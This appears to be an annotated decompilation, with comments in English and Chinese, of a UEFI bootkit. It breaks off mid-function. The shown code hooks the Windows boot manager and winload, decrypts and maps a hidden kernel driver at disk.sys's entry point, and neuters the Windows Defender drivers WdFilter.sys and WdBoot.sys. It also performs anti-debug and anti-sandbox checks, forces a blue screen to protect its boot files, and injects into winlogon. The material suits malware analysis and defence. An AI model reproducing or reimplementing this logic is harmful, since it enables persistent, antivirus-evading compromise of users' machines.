v7 = *(_BYTE *)ptr == END_ENTIRE_DEVICE_PATH_SUBTYPE;// IsDevicePathEndSubType(a)
if ( *(_BYTE *)ptr == (unsigned __int8)END_ENTIRE_DEVICE_PATH_SUBTYPE )
break;
}
if ( i > 0x200 )
{
v7 = *(_BYTE *)ptr == END_ENTIRE_DEVICE_PATH_SUBTYPE;// IsDevicePathEndSubType
break;
}
next = (EFI_DEVICE_PATH *)((char *)next + *(unsigned __int16 *)next->Length);// NextDevicePathNode
}
if ( !v7 )
last = (EFI_DEVICE_PATH *)((char *)next + *(unsigned __int16 *)next->Length);// NextDevicePathNode
*start = last;
last = first;
*node_size = (char *)next - (char *)first;
}
return last;
}
anti_debug_rdtsc
__int64 anti_debug_rdtsc()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 0;
v1 = 0i64;
v2 = 20i64;
do
{
v3 = _rdtsc_180003060();
_RAX = 0i64;
__asm { cpuid }
v1 += _rdtsc_180003060() - v3;
--v2;
}
while ( v2 );
if ( (unsigned __int64)(v1 - 20) > 19999 )
return 1;
return v0;
}
OutputLogo_180002A08
void __noreturn OutputLogo_180002A08()
{
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL *ConOut; // rbx
CHAR16 String[1300]; // [rsp+20h] [rbp-A28h] BYREF
ConOut = gEfiSystemTable->ConOut;
// ░░░░░░░░░░░░░░░░██████████████████
// ░░░░░░░░░░░░████░░░░░░░░░░░░░░░░░░████
// ░░░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░██
// ░░░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░██
// ░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██
// ░░░░░░░░██░░░░░░░░░░░░░░░░░░░░██████░░░░██
// ░░░░░░░░██░░░░░░░░░░░░░░░░░░░░██████░░░░██
// ░░░░░░░░██░░░░██████░░░░██░░░░██████░░░░██
// ░░░░░░░░░░██░░░░░░░░░░██████░░░░░░░░░░██
// ░░░░░░░░████░░██░░░░░░░░░░░░░░░░░░██░░████
// ░░░░░░░░██░░░░██████████████████████░░░░██
// ░░░░░░░░██░░░░░░██░░██░░██░░██░░██░░░░░░██
// ░░░░░░░░░░████░░░░██████████████░░░░████
// ░░░░░░██░░██████████████████████████████░░██
// ░░░░████░░██░░░░██░░░░░░██░░░░░░██░░░░██░░████
// ░░░░██░░░░░░██░░░░██████░░██████░░░░██░░░░░░██
// ░░██░░░░████░░██████░░░░██░░░░██████░░████░░░░██
// ░░██░░░░░░░░██░░░░██░░░░░░░░░░██░░░░██░░░░░░░░██
// ░░██░░░░░░░░░░██░░██░░░░░░░░░░██░░██░░░░░░░░░░██
// ░░░░██░░░░░░██░░░░████░░░░░░████░░░░██░░░░░░██
// ░░░░░░████░░██░░░░██░░░░░░░░░░██░░░░██░░████
// ░░░░░░░░██████░░░░██████████████░░░░██████
// ░░░░░░░░░░████░░░░██████████████░░░░████
// ░░░░░░░░██████████████████████████████████
// ░░░░░░░░████████████████░░████████████████
// ░░░░░░░░░░████████████░░░░░░████████████
// ░░░░░░██████░░░░░░░░██░░░░░░██░░░░░░░░██████
// ░░░░░░██░░░░░░░░░░████░░░░░░████░░░░░░░░░░██
// ░░░░░░░░██████████░░░░░░░░░░░░░░██████████
strcpy_180001024(String, (__int64)byte_1800040C0, 0xA16i64);
ConOut->ClearScreen(ConOut);
ConOut->OutputString(ConOut, String);
while ( 1 )
gEfiBootServices->Stall(0x1C9C380ui64);
}
GetPeFileVersionInfo_BuildNumber_180002538
__int64 __fastcall GetPeFileVersionInfo_BuildNumber_180002538(__int64 ImageBase)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
ret = 0;
if ( *(_WORD *)ImageBase == 23117 && *(_DWORD *)(*(int *)(ImageBase + 60) + ImageBase) == 17744 )
{
ResourceDirTable = RtlpImageDirectoryEntryToDataEx_RESOURCE_1800024C4(ImageBase, 1);
if ( ResourceDirTable )
{
if ( *(_WORD *)(ResourceDirTable + 14) <= 100u )
{
i = *(unsigned __int16 *)(ResourceDirTable + 12);
v5 = i + *(unsigned __int16 *)(ResourceDirTable + 14);
if ( i < v5 )
{
// typedef struct _IMAGE_RESOURCE_DIRECTORY_ENTRY {
// union {
// struct {
// DWORD NameOffset : 31;
// DWORD NameIsString : 1;
// };
// DWORD Name;
// WORD Id;
// };
// union {
// DWORD OffsetToData;
// struct {
// DWORD OffsetToDirectory : 31;
// DWORD DataIsDirectory : 1;
// };
// };
// } IMAGE_RESOURCE_DIRECTORY_ENTRY, *PIMAGE_RESOURCE_DIRECTORY_ENTRY;
do
{
v6 = (unsigned __int16)i;
// (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY)))-->i*8
// sizeof(EFI_IMAGE_RESOURCE_DIRECTORY)-->0x10
// DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY)));
if ( *(int *)(ResourceDirTable + 8i64 * (unsigned __int16)i + 16) >= 0
&& *(_WORD *)(ResourceDirTable + 8i64 * (unsigned __int16)i + 16) == 16// DirEntry->u1.Id==RT_VERSION
&& *(int *)(ResourceDirTable + 8i64 * (unsigned __int16)i + 20) < 0 )// DirEntry->u2.s.OffsetToDirectory
{
break;
}
LOWORD(i) = i + 1;
}
while ( (unsigned __int16)i < v5 );
if ( *(_WORD *)(ResourceDirTable + 8 * v6 + 16) == 16 )// // DirEntry->u1.Id!=RT_VERSION
{
ResourceDirTable2_ = ResourceDirTable + (*(_DWORD *)(ResourceDirTable + 8 * v6 + 20) & 0x7FFFFFFF);
v8 = *(unsigned __int16 *)(ResourceDirTable2_ + 12);
v9 = v8 + *(unsigned __int16 *)(ResourceDirTable2_ + 14);
if ( v8 < v9 )
{
do
{
v10 = (unsigned __int16)v8;
if ( *(int *)(ResourceDirTable2_ + 8i64 * (unsigned __int16)v8 + 16) >= 0
&& *(_WORD *)(ResourceDirTable2_ + 8i64 * (unsigned __int16)v8 + 16) == 1// DirEntry->u1.Id == VS_VERSION_INFO-->1
&& *(int *)(ResourceDirTable2_ + 8i64 * (unsigned __int16)v8 + 20) < 0 )// DirEntry->u2.s.OffsetToDirectory
{
break;
}
LOWORD(v8) = v8 + 1;
}
while ( (unsigned __int16)v8 < v9 );
if ( *(_WORD *)(ResourceDirTable2_ + 8 * v10 + 16) == 1 )// DirEntry->u1.Id != VS_VERSION_INFO
{
ResourceDirTable3_ = ResourceDirTable + (*(_DWORD *)(ResourceDirTable2_ + 8 * v10 + 20) & 0x7FFFFFFF);
v12 = *(unsigned __int16 *)(ResourceDirTable3_ + 12);
v13 = v12 + *(unsigned __int16 *)(ResourceDirTable3_ + 14);
if ( v12 < v13 )
{
do
{
v14 = ResourceDirTable3_ + 20 + 8i64 * (unsigned __int16)v12;// DirEntry->u2.OffsetToData
if ( *(int *)(ResourceDirTable3_ + 8i64 * (unsigned __int16)v12 + 16) >= 0 && *(int *)v14 >= 0 )
break;
LOWORD(v12) = v12 + 1;
}
while ( (unsigned __int16)v12 < v13 );
// typedef struct _VS_VERSIONINFO
// {
// UINT16 TotalSize;//+0
// UINT16 DataSize;//+2
// UINT16 Type;//+4
// CHAR16 Name[sizeof(L"VS_VERSION_INFO") / sizeof(CHAR16)]; // Size includes null terminator//32d +8
// VS_FIXEDFILEINFO FixedFileInfo;
// // Omitted: padding fields that do not contribute to TotalSize
// } VS_VERSIONINFO, *PVS_VERSIONINFO;
// typedef struct _VS_FIXEDFILEINFO//+40d
// {
// UINT32 dwSignature; // 0xFEEF04BD //+40d
// UINT32 dwStrucVersion;//+44d
// UINT32 dwFileVersionMS;//+48d
// UINT32 dwFileVersionLS;//+52d *BuildNumber = HIWORD(VersionResource->FixedFileInfo.dwFileVersionLS);
// UINT32 dwProductVersionMS;//+56d
// UINT32 dwProductVersionLS;//+60d
// UINT32 dwFileFlagsMask;
// UINT32 dwFileFlags;
// UINT32 dwFileOS;
// UINT32 dwFileType;
// UINT32 dwFileSubtype;
// UINT32 dwFileDateMS;
// UINT32 dwFileDateLS;
// } VS_FIXEDFILEINFO;
return *(unsigned __int16 *)(*(unsigned int *)(*(unsigned int *)v14 + ResourceDirTable)
+ ImageBase
+ 0x36);
}
}
}
}
}
}
}
}
return ret;
}
HookedBootManagerImgArchStartBootApplication
__int64 __fastcall HookedBootmgfwImgArchStartBootApplication_Eight_180001D80(
__int64 AppEntry,
EFI_IMAGE_DOS_HEADER *ImageBase,
unsigned int ImageSize,
unsigned int BootOption,
__int64 ReturnArguments)
{
return HookedBootManagerImgArchStartBootApplication_180001C90(
AppEntry,
ImageBase,
ImageSize,
BootOption,
ReturnArguments,
(char *)SigImgArchStartBootApplication,
hookbackup_180015C78);
}
__int64 __fastcall HookedBootmgfwImgArchEfiStartBootApplication_Vista_180001D48(
__int64 a1,
EFI_IMAGE_DOS_HEADER *a2,
unsigned int a3,
__int64 a4)
{
return HookedBootManagerImgArchStartBootApplication_180001C90(
a1,
a2,
a3,
0xFFFFu,
a4,
(char *)SigImgArchStartBootApplication,
hookbackup_180015C78);
}
__int64 __fastcall HookedBootManagerImgArchStartBootApplication_180001C90(
__int64 AppEntry,
EFI_IMAGE_DOS_HEADER *ImageBase,
unsigned int ImageSize,
unsigned int BootOption,
__int64 ReturnArguments,
char *SigImgArchStartBootApplication,
char *OriginalFunctionBytes)
{
int InputFileType_180002DF8; // esi
int v12; // esi
// 2; // BootmgrEfi
// 3; // WinloadEfi
InputFileType_180002DF8 = GetInputFileType_180002DF8(ImageBase, ImageSize);
strcpy_180001024(SigImgArchStartBootApplication, (__int64)OriginalFunctionBytes, 14i64);
v12 = InputFileType_180002DF8 - 2;
if ( v12 )
{
if ( v12 == 1 )
PatchWinload_WinloadEfi_180002280(ImageBase);// WinloadEfi
}
else
{
PatchBootManager_BootmgrEfi_1800021D8(ImageBase);// BootmgrEfi
}
if ( BootOption == 0xFFFF )
return ((__int64 (__fastcall *)(__int64, EFI_IMAGE_DOS_HEADER *, _QWORD, __int64))SigImgArchStartBootApplication)(
AppEntry,
ImageBase,
ImageSize,
ReturnArguments);
else
return ((__int64 (__fastcall *)(__int64, EFI_IMAGE_DOS_HEADER *, _QWORD, _QWORD, __int64))SigImgArchStartBootApplication)(
AppEntry,
ImageBase,
ImageSize,
BootOption,
ReturnArguments);
}
PatchWinload_WinloadEfi_180002280
void __fastcall PatchWinload_WinloadEfi_180002280(_BYTE *winloadImageBase)
{
_BYTE *Pattern_180002F68; // rdi
_BYTE *v3; // rsi
EFI_TPL v4; // rbx
gAllocatedBuffer_180015C68 = 0i64;
gAllocatedBufferStatus_180015C60 = -1;
AES_CBC_256_DEC_180001070(mapper_hk_180005040, 0x10C10);// TTTTTTTTTTTTTTTTTTTT
// Memory load
if ( *(_WORD *)mapper_hk_180005040 == 0x4B48 )// MZSignature-->custom Signature HK
{
// .text:000000018008E97D 81 E3 00 00 FF 00 and ebx, 0FF0000h
// .text:000000018008E9E9 81 E3 00 00 FF 00 and ebx, 0FF0000h
Pattern_180002F68 = FindPattern_180002F68(winloadImageBase, pattern_BlImgAllocateImageBuffer_180004030, 6u);
if ( Pattern_180002F68 )
{
// .text:000000018015A28A 48 0D 20 00 05 00 or rax, 50020h
// OslArchTransferToKernel
v3 = FindPattern_180002F68(winloadImageBase, pattern_OslArchTransferToKernel_180004038, 6u);
if ( v3 )
{
BlImgAllocateImageBuffer = (char *)BacktrackToFunctionStart_180002398(
(__int64)winloadImageBase,
(__int64)Pattern_180002F68);
if ( BlImgAllocateImageBuffer )
{
OslArchTransferToKernel = (char *)BacktrackToFunctionStart_180002398((__int64)winloadImageBase, (__int64)v3);
if ( OslArchTransferToKernel )
{
v4 = gEfiBootServices->RaiseTPL(0x1Fui64);
HookJmp_180002A60(
BlImgAllocateImageBuffer,
(__int64)BlImgAllocateImageBufferHook_180001BAC,
orig_BlImgAllocateImageBuffer_backup_180015CA8);
HookJmp_180002A60(
OslArchTransferToKernel,
(__int64)OslArchTransferToKernelHook_180001AE8,
orig_OslArchTransferToKernel_backup_180015CC0);
gEfiBootServices->RestoreTPL(v4);
}
}
}
}
}
}
BlImgAllocateImageBufferHook_180001BAC
// https://joshfinley.github.io/uefi-development-and-bootkits/
// https://github.com/btbd/umap/blob/master/boot/main.c
__int64 __fastcall BlImgAllocateImageBufferHook_180001BAC(
__int64 imageBuffer,
__int64 imageSize,
unsigned int memoryType,
unsigned int attributes,
int unused,
int flags)
{
char *BlImgAllocateImageBuffer_; // r14
int v11; // ebx
strcpy_180001024(BlImgAllocateImageBuffer, (__int64)orig_BlImgAllocateImageBuffer_backup_180015CA8, 14i64);
BlImgAllocateImageBuffer_ = BlImgAllocateImageBuffer;
v11 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD, _QWORD, int, int))BlImgAllocateImageBuffer)(
imageBuffer,
imageSize,
memoryType,
attributes,
unused,
flags);
// #define BL_MEMORY_TYPE_APPLICATION (0xE0000012)
// #define BL_MEMORY_ATTRIBUTE_RWX (0x424000)
if ( v11 >= 0 && memoryType == 0xE0000012 ) // BL_MEMORY_TYPE_APPLICATION
gAllocatedBufferStatus_180015C60 = ((__int64 (__fastcall *)(__int64 *, _QWORD, __int64, __int64, int, _DWORD))BlImgAllocateImageBuffer_)(
&gAllocatedBuffer_180015C68,
*(unsigned int *)&mapper_hk_180005040[*(int *)&mapper_hk_180005040[0x3C] + 0x50],// DWORD SizeOfImage
0xE0000012i64,// BL_MEMORY_TYPE_APPLICATION
0x424000i64,// BL_MEMORY_ATTRIBUTE_RWX
unused,
0);
else
HookJmp_180002A60(
BlImgAllocateImageBuffer,
(__int64)BlImgAllocateImageBufferHook_180001BAC,
orig_BlImgAllocateImageBuffer_backup_180015CA8);
return (unsigned int)v11;
}// https://joshfinley.github.io/uefi-development-and-bootkits/
// https://github.com/btbd/umap/blob/master/boot/main.c
__int64 __fastcall BlImgAllocateImageBufferHook_180001BAC(
__int64 imageBuffer,
__int64 imageSize,
unsigned int memoryType,
unsigned int attributes,
int unused,
int flags)
{
char *BlImgAllocateImageBuffer_; // r14
int v11; // ebx
strcpy_180001024(BlImgAllocateImageBuffer, (__int64)orig_BlImgAllocateImageBuffer_backup_180015CA8, 14i64);
BlImgAllocateImageBuffer_ = BlImgAllocateImageBuffer;
v11 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD, _QWORD, int, int))BlImgAllocateImageBuffer)(
imageBuffer,
imageSize,
memoryType,
attributes,
unused,
flags);
// #define BL_MEMORY_TYPE_APPLICATION (0xE0000012)
// #define BL_MEMORY_ATTRIBUTE_RWX (0x424000)
if ( v11 >= 0 && memoryType == 0xE0000012 ) // BL_MEMORY_TYPE_APPLICATION
gAllocatedBufferStatus_180015C60 = ((__int64 (__fastcall *)(__int64 *, _QWORD, __int64, __int64, int, _DWORD))BlImgAllocateImageBuffer_)(
&gAllocatedBuffer_180015C68,
*(unsigned int *)&mapper_pe_180005040[*(int *)&mapper_pe_180005040[0x3C] + 0x50],// DWORD SizeOfImage
0xE0000012i64,// BL_MEMORY_TYPE_APPLICATION
0x424000i64,// BL_MEMORY_ATTRIBUTE_RWX
unused,
0);
else
HookJmp_180002A60(
BlImgAllocateImageBuffer,
(__int64)BlImgAllocateImageBufferHook_180001BAC,
orig_BlImgAllocateImageBuffer_backup_180015CA8);
return (unsigned int)v11;
}
OslArchTransferToKernelHook_180001AE8
__int64 __fastcall OslArchTransferToKernelHook_180001AE8(LOADER_PARAMETER_BLOCK *KernelParams, __int64 KiSystemStartup)
{
struct _LIST_ENTRY *diskSys_EntryPoint; // rax
char *diskSys_EntryPoint1; // rbx
__int64 mapperEntryPoint; // [rsp+40h] [rbp+18h] BYREF
mapperEntryPoint = 0i64;
strcpy_180001024(OslArchTransferToKernel, orig_OslArchTransferToKernel_backup_180015CC0);
if ( gAllocatedBufferStatus_180015C60 >= 0 )
{
if ( gAllocatedBuffer_180015C68 )
{
// disk.sys 0x79943DBC
// WdFilter.sys 0x065A83C4
// WdBoot.sys 0x9B64473E
// patch WdFilter.sys and WdBoot.sys EntryPoint-->ret
// ret -->disk.sys EntryPoint
diskSys_EntryPoint = PatchWdSysAndReturnDiskSysEP_180002FEC(KernelParams, 0x79943DBC);
diskSys_EntryPoint1 = (char *)diskSys_EntryPoint;
if ( diskSys_EntryPoint )
{
if ( (unsigned int)MapMapper_180001E20(
(__int64)mapper_hk_180005040,
(char *)gAllocatedBuffer_180015C68,
(__int64)diskSys_EntryPoint,
&mapperEntryPoint) )
{
// 4C 8D 05 F9 FF FF FF
// lea r8, ds:[thisaddr]
strcpy_180001024(diskSys_EntryPoint1, "L\x8D\x05\xF9\xFF\xFF\xFF");
HookJmp_180002A60(diskSys_EntryPoint1 + 7, mapperEntryPoint, 0i64);
}
}
}
}
return ((__int64 (__fastcall *)(LOADER_PARAMETER_BLOCK *, __int64))OslArchTransferToKernel)(
KernelParams,
KiSystemStartup);
}
PatchWdSysAndReturnDiskSysEP_180002FEC
struct _LIST_ENTRY *__fastcall PatchWdSysAndReturnDiskSysEP_180002FEC(
LOADER_PARAMETER_BLOCK *KernelParams,
int diskSysHash)
{
struct _KLDR_DATA_TABLE_ENTRY *p_LoadOrderListHead; // rdi
PKLDR_DATA_TABLE_ENTRY Flink; // rbx
void *diskSys_EntryPoint; // rsi
CHAR16 *Buffer; // rcx
int v7; // eax
p_LoadOrderListHead = (struct _KLDR_DATA_TABLE_ENTRY *)&KernelParams->LoadOrderListHead;
Flink = (PKLDR_DATA_TABLE_ENTRY)KernelParams->LoadOrderListHead.Flink;
diskSys_EntryPoint = 0i64;
while ( Flink != p_LoadOrderListHead )
{
Buffer = Flink->BaseImageName.Buffer;
if ( Buffer )
{
v7 = ws_hash_0x1003f_1800029DC(Buffer, Flink->BaseImageName.Length >> 1);
if ( v7 == diskSysHash )
{
diskSys_EntryPoint = Flink->EntryPoint;
}
// WdFilter.sys 0x065A83C4
// WdBoot.sys 0x9B64473E
else if ( v7 == 0x65A83C4 || v7 == 0x9B64473E )
{
*(_BYTE *)Flink->EntryPoint = 0xC3; // ret
}
}
Flink = (PKLDR_DATA_TABLE_ENTRY)Flink->InLoadOrderLinks.Flink;
}
return (struct _LIST_ENTRY *)diskSys_EntryPoint;
}
MapMapper_180001E20
__int64 __fastcall MapMapper_180001E20(
__int64 HKImageBase,
char *AllocatedBuffer,
__int64 diskSys_EntryPoint,
_QWORD *EntryPoint)
{
EFI_IMAGE_NT_HEADERS64 *ntheader; // rsi
// https://github.com/btbd/umap/blob/master/boot/main.c
ntheader = (EFI_IMAGE_NT_HEADERS64 *)(HKImageBase + *(int *)(HKImageBase + 0x3C));
memset_180001000(AllocatedBuffer, 0, ntheader->OptionalHeader.SizeOfHeaders);// 清空NT头
copySection_180001FB8(ntheader, HKImageBase, (__int64)AllocatedBuffer);
resolveRelocations_180001EB0(ntheader, (__int64)AllocatedBuffer);
copyEntryPoint2Exports_180001F6C(ntheader, (__int64)AllocatedBuffer, (_BYTE *)diskSys_EntryPoint);
*EntryPoint = &AllocatedBuffer[ntheader->OptionalHeader.AddressOfEntryPoint];
return 1i64;
}
void __fastcall copySection_180001FB8(EFI_IMAGE_NT_HEADERS64 *ntheader, __int64 HKImageBase, __int64 AllocatedBuffer)
{
char *v3; // rsi
UINT16 i; // bx
unsigned int v8; // eax
v3 = (char *)ntheader + ntheader->FileHeader.SizeOfOptionalHeader;
for ( i = 0; i < ntheader->FileHeader.NumberOfSections; ++i )
{
v8 = *(_DWORD *)&v3[0x28 * i + 0x28];
if ( v8 )
strcpy_180001024(
(_BYTE *)(AllocatedBuffer + *(unsigned int *)&v3[0x28 * i + 0x24]),
HKImageBase + *(unsigned int *)&v3[0x28 * i + 44],
v8);
}
}
__int64 __fastcall resolveRelocations_180001EB0(EFI_IMAGE_NT_HEADERS64 *ntheader, __int64 AllocatedBuffer)
{
__int64 VirtualAddress; // rax
unsigned int v4; // ebx
EFI_IMAGE_RELOCATION *v5; // r9
UINT32 v6; // er10
UINT32 Size; // eax
EFI_IMAGE_RELOCATION *p_Type; // rdx
unsigned __int64 v9; // rax
__int64 v10; // rsi
__int64 v11; // r11
int v12; // eax
// struct IMAGE_DATA_DIRECTORY BaseRelocationTable
VirtualAddress = ntheader->OptionalHeader.DataDirectory[5].VirtualAddress;
v4 = 1;
if ( (_DWORD)VirtualAddress )
{
v5 = (EFI_IMAGE_RELOCATION *)(AllocatedBuffer + VirtualAddress);
v6 = 0;
Size = ntheader->OptionalHeader.DataDirectory[5].Size;
if ( Size )
{
do
{
p_Type = (EFI_IMAGE_RELOCATION *)&v5->Type;
v9 = ((unsigned __int64)v5->SymbolTableIndex - 8) >> 1;
v10 = AllocatedBuffer + v5->VirtualAddress;
if ( (_DWORD)v9 )
{
v11 = (unsigned int)v9;
do
{
v12 = LOWORD(p_Type->VirtualAddress) >> 12;
if ( v12 )
{
if ( v12 == 10 )
*(_QWORD *)((p_Type->VirtualAddress & 0xFFF) + v10) += AllocatedBuffer
- ntheader->OptionalHeader.ImageBase;
else
v4 = 0;
}
p_Type = (EFI_IMAGE_RELOCATION *)((char *)p_Type + 2);
--v11;
}
while ( v11 );
}
v6 += v5->SymbolTableIndex;
v5 = p_Type;
Size = ntheader->OptionalHeader.DataDirectory[5].Size;
}
while ( v6 < Size );
}
memset_180001000(v5, 0, Size);
}
return v4;
}
char __fastcall copyEntryPoint2Exports_180001F6C(
EFI_IMAGE_NT_HEADERS64 *ntheader,
__int64 AllocatedBuffer,
_BYTE *diskSys_EntryPoint)
{
EFI_IMAGE_EXPORT_DIRECTORY *exportsRva; // rax
exportsRva = (EFI_IMAGE_EXPORT_DIRECTORY *)ntheader->OptionalHeader.DataDirectory[EFI_IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
if ( (_DWORD)exportsRva )
{
if ( *(UINT32 *)((char *)&exportsRva->NumberOfNames + AllocatedBuffer) )
LOBYTE(exportsRva) = strcpy_180001024(
(_BYTE *)(AllocatedBuffer
+ *(unsigned int *)(AllocatedBuffer
+ *(unsigned int *)((unsigned int)exportsRva
+ AllocatedBuffer
+ 0x1C)
+ 4i64
* *(unsigned __int16 *)(*(unsigned int *)((char *)&exportsRva->AddressOfNameOrdinals
+ AllocatedBuffer)
+ AllocatedBuffer))),
(__int64)diskSys_EntryPoint,
0x15i64);
}
// // Copy mapper data
// UINT32 exportsRva =
// ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
// .VirtualAddress;
// if (exportsRva) {
// IMAGE_EXPORT_DIRECTORY *exports =
// (IMAGE_EXPORT_DIRECTORY *)(mapperBase + exportsRva);
// if (exports->NumberOfNames) {
// UINT32 *funcRva =
// (UINT32 *)(mapperBase + exports->AddressOfFunctions);
// UINT16 *ordinalRva =
// (UINT16 *)(mapperBase + exports->AddressOfNameOrdinals);
// MemCopy(mapperBase + funcRva[ordinalRva[0]], targetFunction,
// MAPPER_DATA_SIZE);
// }
// }
return (char)exportsRva;
}
PatchBootManager_BootmgrEfi_1800021D8
Legacy bios模式
void __fastcall PatchBootManager_BootmgrEfi_1800021D8(_BYTE *ImageBase_BootmgrEfi)
{
unsigned int BuildNumber; // eax
void *HookAddress; // rdi
_BYTE *Pattern_180002F68; // rax
EFI_TPL v5; // rbx
BuildNumber = GetPeFileVersionInfo_BuildNumber_180002538((__int64)ImageBase_BootmgrEfi);
if ( BuildNumber >= 7600 )
{
HookAddress = HookedBootmgrImgArchStartBootApplication_Eight_180001DF0;
if ( BuildNumber < 9200 )
HookAddress = HookedBootmgrImgArchEfiStartBootApplication_Vista_180001DB8;
Pattern_180002F68 = FindPattern_180002F68(ImageBase_BootmgrEfi, SigImgArchStartBootApplication_180004040, 6u);
if ( Pattern_180002F68 )
{
ImgArchStartBootApplication = BacktrackToFunctionStart_180002398(
(__int64)ImageBase_BootmgrEfi,
(__int64)Pattern_180002F68);
if ( ImgArchStartBootApplication )
{
v5 = gEfiBootServices->RaiseTPL(0x1Fui64);
HookJmp_180002A60(
(_BYTE *)ImgArchStartBootApplication,
(__int64)HookAddress,
orig_ImgArchStartBootApplication_backup_180015C90);
gEfiBootServices->RestoreTPL(v5);
}
}
}
}
HookedBootmgrImgArchStartBootApplication
__int64 __fastcall HookedBootmgrImgArchStartBootApplication_Eight_180001DF0(
__int64 AppEntry,
EFI_IMAGE_DOS_HEADER *ImageBase,
unsigned int ImageSize,
unsigned int BootOption,
__int64 ReturnArguments)
{
return HookedBootManagerImgArchStartBootApplication_180001C90(
AppEntry,
ImageBase,
ImageSize,
BootOption,
ReturnArguments,
(char *)ImgArchStartBootApplication,
hookbackup_180015C78);
}
__int64 __fastcall HookedBootmgrImgArchEfiStartBootApplication_Vista_180001DB8(
__int64 AppEntry,
EFI_IMAGE_DOS_HEADER *ImageBase,
unsigned int ImageSize,
__int64 ReturnArguments)
{
return HookedBootManagerImgArchStartBootApplication_180001C90(
AppEntry,
ImageBase,
ImageSize,
0xFFFFu,
ReturnArguments,
(char *)ImgArchStartBootApplication,
hookbackup_180015C78);
}
mapper_hk(内存加载的内核程序)
OslArchTransferToKernelHook下,在disk.sys入口点进行内存加载mapper_hk,
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
void *v2; // r8
void *diskSys_EntryPoint; // rbx
__int64 ThreadHandle; // [rsp+50h] [rbp+8h] BYREF
diskSys_EntryPoint = v2; // r8-->
// OslArchTransferToKernelHook->PatchWdSysAndReturnDiskSysEP to set diskSys_EntryPoint
gDriverObject_140012418 = DriverObject;
init_ntoskrnl_exe_imports();
// .data:0000000140012400 ; Exported entry 1. restore
// .data:0000000140012400 public restore
// .data:0000000140012400 restore db ? ;
// restore-->bootkit OslArchTransferToKernelHook set Original diskSys_EntryPoint
memcpy_to_kernel(diskSys_EntryPoint, &restore, 0x15u);
if ( (int)((__int64 (__fastcall *)(__int64 *, _QWORD, _QWORD, unsigned __int64, _QWORD, __int64 (*)(), _QWORD))PsCreateSystemThread)(
&ThreadHandle,
THREAD_ALL_ACCESS,
0i64,
0xFFFFFFFFFFFFFFFFui64, // NtCurrentProcess
0i64,
ThreadEntry,
0i64) >= 0 )
((void (__fastcall *)(__int64))ZwClose)(ThreadHandle);
return ((__int64 (__fastcall *)(PDRIVER_OBJECT, PUNICODE_STRING))diskSys_EntryPoint)(DriverObject, RegistryPath);
}
ThreadEntry
__int64 ThreadEntry()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
memset(fpaths, 0, sizeof(fpaths));
Interval.QuadPart = -20000000i64;
remoteThreadHandle = 0i64;
memset(handles_1, 0, sizeof(handles_1));
get_winlogon_process_id();
result = anti_sandbox_check_RSMB();
if ( !(_DWORD)result )
{
result = anti_sandbox_check_ACPI();
if ( !(_DWORD)result )
{
result = anti_debug_rdtsc();
if ( !(_DWORD)result )
{
result = anti_sandbox_mac_address();
if ( !(_DWORD)result )
{
// fpath[3][0x104]={
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\grubx64.efi
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\bootmgfw.efi
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\winload.efi
// }
result = get_files_to_protect((wchar_t *)fpaths);
if ( (_DWORD)result )
{
paths = (wchar_t *)fpaths;
v2 = 3i64;
handles = handles_1;
do
{
protect_file_ProtectFromClose(paths, handles++);
paths += 0x104;
--v2;
}
while ( v2 );
result = init_ksecddSys_api_140001804();
if ( (_DWORD)result )
{
if ( !(unsigned int)is_kernel_debugger_present() )
// RtlCreateUserThread
remoteThreadHandle = inject_into_winlogon();
do
{
result = ((__int64 (__fastcall *)(_QWORD, _QWORD, LARGE_INTEGER *))KeDelayExecutionThread)(
0i64,
0i64,
&Interval); // -20000000负值表示相对时间,100 纳秒为单位,除以10 * 1000 * 1000得s,-->2s
if ( (int)result < 0 )
break;
// 检查句柄,不存在时蓝屏
protect_file_handles_BSOD(handles_1);
inject_into_winlogon_if_thread_not(&remoteThreadHandle);
remove_defender_Privileges();
result = do_ipc((__int64)fpaths, handles_1);
}
while ( !(_DWORD)result );
}
}
}
}
}
}
if ( remoteThreadHandle )
return ((__int64 (*)(void))ZwClose)();
return result;
}
get_winlogon_process_id
HANDLE get_winlogon_process_id()
{
HANDLE result; // rax
__int64 v1; // [rsp+30h] [rbp+8h] BYREF
v1 = -20000000i64;
do
{
((void (__fastcall *)(_QWORD, _QWORD, __int64 *))KeDelayExecutionThread)(0i64, 0i64, &v1);
// winlogon.exe 0xA9CFE2CB
result = get_process_id_by_hash(0xA9CFE2CB);// 0xA9CFE2CB
}
while ( !result );
return result;
}
HANDLE __fastcall get_process_id_by_hash(int a1)
{
HANDLE UniqueProcessId; // rbx
SYSTEM_PROCESS_INFORMATION *ProcessInformations; // rsi
unsigned int i; // eax
int v5; // eax
SYSTEM_PROCESS_INFORMATION *ProcessInformations1; // rdi
__int64 NextEntryOffset; // rbp
unsigned __int64 v8; // rax
unsigned int infoLength; // [rsp+30h] [rbp-238h] BYREF
__int16 v11[256]; // [rsp+40h] [rbp-228h] BYREF
UniqueProcessId = 0i64;
ProcessInformations = 0i64;
infoLength = 0;
for ( i = 0; ; i = infoLength )
{
if ( ProcessInformations )
{
((void (__fastcall *)(SYSTEM_PROCESS_INFORMATION *))ExFreePool)(ProcessInformations);
i = infoLength;
}
infoLength = i + 0x1000;
